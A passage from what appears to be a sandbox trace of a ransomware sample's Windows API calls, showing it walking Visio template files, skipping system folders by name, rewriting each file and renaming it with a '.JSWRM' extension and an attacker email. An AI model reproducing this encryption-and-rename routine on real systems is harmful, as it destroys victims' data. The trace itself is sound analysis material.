lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.197] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x7550, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x7550, lpOverlapped=0x0) returned 1 [0147.201] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.201] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x7550, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x7550, lpOverlapped=0x0) returned 1 [0147.201] CloseHandle (hObject=0x314) returned 1 [0147.201] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBIDEF1X_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbidef1x_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBIDEF1X_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbidef1x_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.202] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49f9415, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49f9415, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49f9415, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x60a9, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DBIDEF1X_U.VSTX", cAlternateFileName="DBIDEF~1.VST")) returned 1 [0147.202] lstrcmpiW (lpString1="DBIDEF1X_U.VSTX", lpString2=".") returned 1 [0147.202] lstrcmpiW (lpString1="DBIDEF1X_U.VSTX", lpString2="..") returned 1 [0147.202] lstrcmpiW (lpString1="DBIDEF1X_U.VSTX", lpString2="...") returned 1 [0147.203] lstrcmpiW (lpString1="DBIDEF1X_U.VSTX", lpString2="windows") returned -1 [0147.203] lstrcmpiW (lpString1="DBIDEF1X_U.VSTX", lpString2="recovery") returned -1 [0147.203] lstrcmpiW (lpString1="DBIDEF1X_U.VSTX", lpString2="perflogs") returned -1 [0147.203] lstrcmpiW (lpString1="DBIDEF1X_U.VSTX", lpString2="documents and settings") returned -1 [0147.203] lstrcmpiW (lpString1="DBIDEF1X_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0147.203] lstrcmpiW (lpString1="DBIDEF1X_U.VSTX", lpString2="system volume information") returned -1 [0147.203] lstrcmpiW (lpString1="DBIDEF1X_U.VSTX", lpString2="msocache") returned -1 [0147.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBIDEF1X_U.VSTX", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0147.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBIDEF1X_U.VSTX", cchWideChar=15, lpMultiByteStr=0x345e870, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBIDEF1X_U.VSTX", lpUsedDefaultChar=0x0) returned 15 [0147.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBIDEF1X_U.VSTX", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0147.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBIDEF1X_U.VSTX", cchWideChar=15, lpMultiByteStr=0x345e840, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBIDEF1X_U.VSTX", lpUsedDefaultChar=0x0) returned 15 [0147.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.203] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBIDEF1X_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbidef1x_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.204] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=24745) returned 1 [0147.204] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.204] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x60a0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x60a0, lpOverlapped=0x0) returned 1 [0147.207] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.207] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x60a0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x60a0, lpOverlapped=0x0) returned 1 [0147.207] CloseHandle (hObject=0x314) returned 1 [0147.208] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBIDEF1X_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbidef1x_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBIDEF1X_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbidef1x_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.209] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18ccc9d, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x18ccc9d, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x193f5ad, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x6c55, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DBUML_M.VSSX", cAlternateFileName="DBUML_~1.VSS")) returned 1 [0147.209] lstrcmpiW (lpString1="DBUML_M.VSSX", lpString2=".") returned 1 [0147.209] lstrcmpiW (lpString1="DBUML_M.VSSX", lpString2="..") returned 1 [0147.209] lstrcmpiW (lpString1="DBUML_M.VSSX", lpString2="...") returned 1 [0147.209] lstrcmpiW (lpString1="DBUML_M.VSSX", lpString2="windows") returned -1 [0147.209] lstrcmpiW (lpString1="DBUML_M.VSSX", lpString2="recovery") returned -1 [0147.209] lstrcmpiW (lpString1="DBUML_M.VSSX", lpString2="perflogs") returned -1 [0147.209] lstrcmpiW (lpString1="DBUML_M.VSSX", lpString2="documents and settings") returned -1 [0147.209] lstrcmpiW (lpString1="DBUML_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.209] lstrcmpiW (lpString1="DBUML_M.VSSX", lpString2="system volume information") returned -1 [0147.209] lstrcmpiW (lpString1="DBUML_M.VSSX", lpString2="msocache") returned -1 [0147.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBUML_M.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0147.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBUML_M.VSSX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBUML_M.VSSX", lpUsedDefaultChar=0x0) returned 12 [0147.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBUML_M.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0147.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBUML_M.VSSX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBUML_M.VSSX", lpUsedDefaultChar=0x0) returned 12 [0147.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.209] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBUML_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbuml_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.213] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=27733) returned 1 [0147.213] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.213] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x6c50, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x6c50, lpOverlapped=0x0) returned 1 [0147.216] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.216] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x6c50, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x6c50, lpOverlapped=0x0) returned 1 [0147.217] CloseHandle (hObject=0x314) returned 1 [0147.217] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBUML_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbuml_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBUML_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbuml_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.218] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4a1f7cc, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4a1f7cc, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4a1f7cc, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x5e76, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DBUML_M.VSTX", cAlternateFileName="DBUML_~2.VST")) returned 1 [0147.221] lstrcmpiW (lpString1="DBUML_M.VSTX", lpString2=".") returned 1 [0147.221] lstrcmpiW (lpString1="DBUML_M.VSTX", lpString2="..") returned 1 [0147.221] lstrcmpiW (lpString1="DBUML_M.VSTX", lpString2="...") returned 1 [0147.221] lstrcmpiW (lpString1="DBUML_M.VSTX", lpString2="windows") returned -1 [0147.221] lstrcmpiW (lpString1="DBUML_M.VSTX", lpString2="recovery") returned -1 [0147.221] lstrcmpiW (lpString1="DBUML_M.VSTX", lpString2="perflogs") returned -1 [0147.221] lstrcmpiW (lpString1="DBUML_M.VSTX", lpString2="documents and settings") returned -1 [0147.221] lstrcmpiW (lpString1="DBUML_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0147.221] lstrcmpiW (lpString1="DBUML_M.VSTX", lpString2="system volume information") returned -1 [0147.221] lstrcmpiW (lpString1="DBUML_M.VSTX", lpString2="msocache") returned -1 [0147.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBUML_M.VSTX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0147.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBUML_M.VSTX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBUML_M.VSTX", lpUsedDefaultChar=0x0) returned 12 [0147.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBUML_M.VSTX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0147.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBUML_M.VSTX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBUML_M.VSTX", lpUsedDefaultChar=0x0) returned 12 [0147.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.221] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBUML_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbuml_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.222] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=24182) returned 1 [0147.222] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.222] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5e70, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5e70, lpOverlapped=0x0) returned 1 [0147.225] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.225] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5e70, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5e70, lpOverlapped=0x0) returned 1 [0147.225] CloseHandle (hObject=0x314) returned 1 [0147.230] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBUML_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbuml_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBUML_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbuml_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.231] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1cac944, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1cac944, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1cac944, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x6812, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DBUML_U.VSSX", cAlternateFileName="DBUML_~2.VSS")) returned 1 [0147.231] lstrcmpiW (lpString1="DBUML_U.VSSX", lpString2=".") returned 1 [0147.231] lstrcmpiW (lpString1="DBUML_U.VSSX", lpString2="..") returned 1 [0147.231] lstrcmpiW (lpString1="DBUML_U.VSSX", lpString2="...") returned 1 [0147.231] lstrcmpiW (lpString1="DBUML_U.VSSX", lpString2="windows") returned -1 [0147.231] lstrcmpiW (lpString1="DBUML_U.VSSX", lpString2="recovery") returned -1 [0147.232] lstrcmpiW (lpString1="DBUML_U.VSSX", lpString2="perflogs") returned -1 [0147.232] lstrcmpiW (lpString1="DBUML_U.VSSX", lpString2="documents and settings") returned -1 [0147.232] lstrcmpiW (lpString1="DBUML_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.232] lstrcmpiW (lpString1="DBUML_U.VSSX", lpString2="system volume information") returned -1 [0147.232] lstrcmpiW (lpString1="DBUML_U.VSSX", lpString2="msocache") returned -1 [0147.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBUML_U.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0147.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBUML_U.VSSX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBUML_U.VSSX", lpUsedDefaultChar=0x0) returned 12 [0147.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBUML_U.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0147.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBUML_U.VSSX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBUML_U.VSSX", lpUsedDefaultChar=0x0) returned 12 [0147.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.232] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBUML_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbuml_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.233] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=26642) returned 1 [0147.233] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.233] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x6810, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x6810, lpOverlapped=0x0) returned 1 [0147.236] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.236] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x6810, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x6810, lpOverlapped=0x0) returned 1 [0147.236] CloseHandle (hObject=0x314) returned 1 [0147.236] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBUML_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbuml_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBUML_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbuml_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.237] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4a1f7cc, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4a1f7cc, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4a1f7cc, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x5c93, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DBUML_U.VSTX", cAlternateFileName="DBUML_~1.VST")) returned 1 [0147.237] lstrcmpiW (lpString1="DBUML_U.VSTX", lpString2=".") returned 1 [0147.237] lstrcmpiW (lpString1="DBUML_U.VSTX", lpString2="..") returned 1 [0147.237] lstrcmpiW (lpString1="DBUML_U.VSTX", lpString2="...") returned 1 [0147.237] lstrcmpiW (lpString1="DBUML_U.VSTX", lpString2="windows") returned -1 [0147.238] lstrcmpiW (lpString1="DBUML_U.VSTX", lpString2="recovery") returned -1 [0147.238] lstrcmpiW (lpString1="DBUML_U.VSTX", lpString2="perflogs") returned -1 [0147.238] lstrcmpiW (lpString1="DBUML_U.VSTX", lpString2="documents and settings") returned -1 [0147.238] lstrcmpiW (lpString1="DBUML_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0147.238] lstrcmpiW (lpString1="DBUML_U.VSTX", lpString2="system volume information") returned -1 [0147.238] lstrcmpiW (lpString1="DBUML_U.VSTX", lpString2="msocache") returned -1 [0147.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBUML_U.VSTX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0147.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBUML_U.VSTX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBUML_U.VSTX", lpUsedDefaultChar=0x0) returned 12 [0147.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBUML_U.VSTX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0147.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBUML_U.VSTX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBUML_U.VSTX", lpUsedDefaultChar=0x0) returned 12 [0147.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.238] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBUML_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbuml_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.239] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=23699) returned 1 [0147.239] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.239] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5c90, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5c90, lpOverlapped=0x0) returned 1 [0147.242] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.242] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5c90, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5c90, lpOverlapped=0x0) returned 1 [0147.242] CloseHandle (hObject=0x314) returned 1 [0147.242] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBUML_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbuml_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio 